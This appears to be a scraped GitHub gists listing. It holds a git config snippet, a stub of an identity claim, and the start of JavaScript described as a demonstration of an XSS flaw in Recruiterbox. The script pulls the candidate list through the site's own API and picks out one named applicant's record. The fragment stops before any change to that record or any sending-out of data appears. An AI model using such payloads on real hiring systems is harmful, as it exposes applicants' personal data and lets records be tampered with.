HTTPS
https://djadmin.github.io/pwn/referer.html
HTTP
| $ vim .git/config | |
| push = +refs/heads/master:refs/heads/gh-pages | |
| push = +refs/heads/master:refs/heads/master |
I hereby claim:
To claim this, I am signing this object:
| // Below code was used to demonstrate hiring made so easy - Recruiterbox XSS. | |
| var candidates = []; | |
| var request = new XMLHttpRequest(); | |
| request.open('GET', '/api/v1/candidates/', true); | |
| request.onload = function() { | |
| var data = JSON.parse(request.responseText); | |
| console.log(data); | |
| candidates = data && data.objects; | |
| var profile = candidates.find(function (cand) { | |
| return cand.first_name === 'Dheeraj' && cand.last_name === 'Joshi'; |